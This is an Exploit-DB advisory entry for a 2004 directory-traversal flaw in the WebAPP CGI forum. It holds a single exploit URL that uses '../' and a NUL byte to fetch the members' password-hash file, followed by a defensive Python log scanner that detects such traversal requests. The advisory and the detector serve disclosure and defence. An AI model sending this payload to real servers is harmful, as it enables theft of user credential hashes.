Exploit Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal

Exploiter

18 Dec 2022
EDB-ID: 24408
EDB Verified: Passed
Author: JEROME ATHIAS
Vulnerability type: WEBAPPS
Platform: CGI
CVE: CVE-2004-1742
Publication date: 2004-08-24
Code:
source: https://www.securityfocus.com/bid/11028/info

WebAPP is reported prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input data.

An attacker can exploit this vulnerability to retrieve arbitrary, potentially sensitive files from the hosting computer with the privileges of the webserver. The attacker could trivially retrieve DES-encrypted password hashes for all users of the application. This may aid the attacker in further attacks.

http://www.example.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
 
Source
www.exploit-db.com
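
For defenders reviewing web-server logs for this issue, the following is an added example (not part of the original advisory or of WebAPP) that flags requests whose `viewcat` parameter contains a `..` path segment or a NUL byte. It also decodes repeated percent-encoding, which goes beyond the single request shown above; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from the advisory); addresses and times are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2004:10:00:01 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=general HTTP/1.0" 200 5120',
    '192.0.2.44 - - [24/Aug/2004:10:00:07 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00 HTTP/1.0" 200 311',
    '192.0.2.44 - - [24/Aug/2004:10:00:09 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=%252e%252e%252fdb%252fmembers HTTP/1.0" 200 0',
    '192.0.2.10 - - [24/Aug/2004:10:00:12 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=news..2004 HTTP/1.0" 200 4801',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_reasons(value):
    """Return why a parameter value looks like a traversal attempt (empty if clean)."""
    value = fully_decode(value)
    reasons = []
    if "\x00" in value:  # a NUL can truncate the filename once it reaches C string APIs
        reasons.append("nul-byte")
    if ".." in re.split(r"[\\/]", value):  # a whole path segment equal to ".."
        reasons.append("dot-dot-segment")
    return reasons

def scan(lines, param="viewcat"):
    """Return (line_number, reasons) for each request with a suspicious `param`."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            reasons = traversal_reasons(value) if key == param else []
            if reasons:
                findings.append((number, reasons))
    return findings

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

Matching on whole `..` segments rather than the substring keeps a value such as `news..2004` from being flagged.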